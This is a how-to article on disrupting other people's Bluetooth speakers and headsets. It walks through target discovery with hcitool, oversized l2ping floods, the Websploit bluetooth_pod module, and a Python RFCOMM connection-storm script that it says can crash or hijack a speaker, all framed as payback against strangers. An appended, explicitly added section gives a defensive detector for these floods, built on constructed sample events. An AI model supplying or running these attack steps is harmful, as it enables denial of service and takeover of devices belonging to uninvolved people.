DoS on Bluetooth: A Trick to Disable Someone Else’s Speaker
There aren’t many things in life that annoy almost everyone: spring and fall slush, summer hot water outages, and kids with portable Bluetooth speakers. While you can’t do much about the first two, you can actually fight back against the third—almost without breaking the law. Here’s how.
Unlike modern Wi-Fi routers that can filter unwanted packets, most Bluetooth adapters are, to put it mildly, not very smart. They don’t really care what kind of packet you send, how big it is, or how many you send. That’s why it’s easy in Linux to increase the size of a ping packet to a huge value and then send, say, 1,000 of these packets to a Bluetooth device.
Step-by-Step Guide
Finding Devices in Range
First, you need to find suitable devices within range. Use the following command:
$ hcitool scan
This will give you a list of available Bluetooth devices and their MAC addresses. If your system doesn’t detect your Bluetooth adapter, try installing a Bluetooth manager for Linux. On Kali, gnome-bluetooth works well:
$ apt-get install gnome-bluetooth
You can also use blueman:
$ apt-get install blueman
Disabling Devices: Methods
Once you have a list of potential targets, you can disrupt their Bluetooth devices in several ways. Let’s look at each method.
Method 1: l2ping
Use this command:
$ l2ping -i hci0 -s <packet value> -f <MAC_address>
This generates L2CAP echo requests (pings) of the payload size you specify and floods them at the target MAC address. You’ll notice the response time shown in the terminal gradually increases, and the targeted device’s Bluetooth will likely disconnect. After a while it will reconnect, but the music will be interrupted—satisfying, right?
Info: This method works especially well when the target device (like a phone) is connected to a headset or speaker via Bluetooth. After the attack, the two devices won’t be able to connect to each other.
Method 2: Websploit
There’s a more elegant way to silence a speaker blasting music. Launch Websploit:
$ websploit
In the console, enter:
$ show modules
This shows all available modules. Look for bluetooth/bluetooth_pod:
$ use bluetooth/bluetooth_pod
Set the parameters for the target device:
$ show options
$ set bdaddr <MAC_address>
To make sure the attack is effective, increase the packet size:
$ set size 999
Now, start the attack:
$ run
You’ll see similar results: pings slow down, and the music stops. Beautiful!
These two methods work on almost any Bluetooth speaker, headset, or similar device, mainly because manufacturers rarely release firmware updates that filter incoming packets. So, if you have a Linux laptop, you can call yourself the nemesis of portable speakers.
If the speaker withstands the attack, try sending packets to the phone it’s connected to. In my tests, a powerful portable speaker (JBL Xtreme) handled the load fairly well, but cheap knockoffs usually crash instantly.
About Ready-Made Jammers
You can find various signal jammers for sale online. They’re usually expensive and offer different features. Some can block almost all mobile, Wi-Fi, and Bluetooth signals at once, while others can’t even handle basic signals.
If you think you really need such a device, make sure to check your local laws before buying. In Russia, buying and selling jammers isn’t prohibited, but using one requires registration with the State Commission for Radio Frequencies (GKRCh). If you’re caught using an unregistered jammer, you’ll likely be fined under Article 13.4 of the Administrative Code. The fine is currently 500 rubles for individuals and up to 10,000 for businesses.
Connecting to Someone Else’s Device
As we’ve seen, basic speakers and headsets almost never filter the packets you send. But what happens if you send not just a ping, but a connection request? And not just one, but many?
Not all manufacturers protect their devices against this kind of overflow. If every incoming request is queued, what happens when the queue fills up? The speaker will try to process the request and clear the buffer.
To do this, we use the standard Bluetooth serial data protocol, RFCOMM. Since the utility that controls the protocol won’t let you send a thousand requests manually, here’s a simple Python script that automates the process:
#!/usr/bin/env python
import subprocess

# rfcomm connect <bdaddr> <channel>: repeated 1001 times against channel 1
cmd = ['rfcomm', 'connect', '<MAC_address>', '1']
for i in range(0, 1001):
    subprocess.call(cmd)
    print('Connecting...')
Before running the script, get the device’s MAC address using hcitool scan and insert it into the script. Save and run the script:
$ python <FileName>
Whether the script works depends on how quickly the target device drains its request queue. If the queue fills before it’s cleared, the connection request goes through and you’ll be connected to the speaker at the same time as the main user. If not, you’ll need to restart the script.
If successful, you can hijack the speaker or disable it. In my experiments, the JBL Xtreme shut down, and I was once able to take over a JBL Flip 2 (though I don’t have it handy now).
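Both techniques on this page, the oversized L2CAP echo-request flood (l2ping and the bluetooth_pod module) and the RFCOMM connection storm, have the same signature from the victim’s side: one source address generating far more requests, or far larger echo payloads, than any legitimate peer. The following is an added example, not part of the original article or of any of the tools it names, showing how a defender monitoring a Bluetooth stack would flag both patterns with a sliding-window rate check plus a payload-size check. The event records, the thresholds, and the field layout are constructed assumptions for the example; they are a simplification, not btmon or hcidump output.

```python
#!/usr/bin/env python3
"""Rate- and size-based detector for L2CAP echo-request floods and RFCOMM
connection storms. Added example with a constructed, simplified event
format; it is not the page's own tooling and not btmon/hcidump output."""
from collections import defaultdict, deque

# Each event: (timestamp in seconds, source bdaddr, kind, payload bytes).
# Constructed sample: one benign peer, one source flooding oversized echo
# requests, one source hammering RFCOMM connect.
SAMPLE_EVENTS = []
# benign: a phone pinging once a second with l2ping's default 44-byte payload
for t in range(10):
    SAMPLE_EVENTS.append((t * 1.0, "AA:BB:CC:00:00:01", "l2cap_echo_req", 44))
# flood: 60 oversized echo requests inside half a second
for i in range(60):
    SAMPLE_EVENTS.append((2.0 + i * 0.008, "AA:BB:CC:00:00:02", "l2cap_echo_req", 999))
# connection storm: 30 RFCOMM connect requests inside two seconds
for i in range(30):
    SAMPLE_EVENTS.append((5.0 + i * 0.066, "AA:BB:CC:00:00:03", "rfcomm_connect_req", 0))
SAMPLE_EVENTS.sort()

WINDOW_S = 1.0
THRESHOLDS = {            # assumed per-window limits per source; tune for your environment
    "l2cap_echo_req": 20,
    "rfcomm_connect_req": 5,
}
MAX_ECHO_PAYLOAD = 600    # assumed cut-off; far above l2ping's 44-byte default


def detect(events, window_s=WINDOW_S, thresholds=THRESHOLDS,
           max_echo_payload=MAX_ECHO_PAYLOAD):
    """Return a list of alert dicts in event order. Each (source, kind) pair is
    reported at most once per reason so the flood does not flood the output."""
    recent = defaultdict(deque)   # (src, kind) -> timestamps still inside the window
    reported = set()
    alerts = []
    for ts, src, kind, size in sorted(events):
        key = (src, kind)
        q = recent[key]
        q.append(ts)
        while q and ts - q[0] > window_s:   # evict timestamps older than the window
            q.popleft()
        # a single oversized echo request is enough to flag the source
        if (kind == "l2cap_echo_req" and size > max_echo_payload
                and (key, "oversized") not in reported):
            reported.add((key, "oversized"))
            alerts.append({"source": src, "kind": kind, "reason": "oversized",
                           "size": size, "ts": ts})
        limit = thresholds.get(kind)
        if limit is not None and len(q) > limit and (key, "rate") not in reported:
            reported.add((key, "rate"))
            alerts.append({"source": src, "kind": kind, "reason": "rate",
                           "count": len(q), "ts": ts})
    return alerts


def flagged_sources(events):
    """Sorted list of source addresses that triggered at least one alert."""
    return sorted({a["source"] for a in detect(events)})


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

On the constructed sample the benign peer produces no alert, the echo-flooding source is reported twice (once for the 999-byte payload on its first packet, once when its per-second count passes 20), and the connect-storming source is reported once on its sixth request. The per-kind thresholds are the knob: a real deployment would derive them from what the device’s legitimate peers actually send, and a speaker vendor would enforce the same limits in firmware by dropping echo requests above a sane size and rejecting connection attempts from a peer that already has one pending.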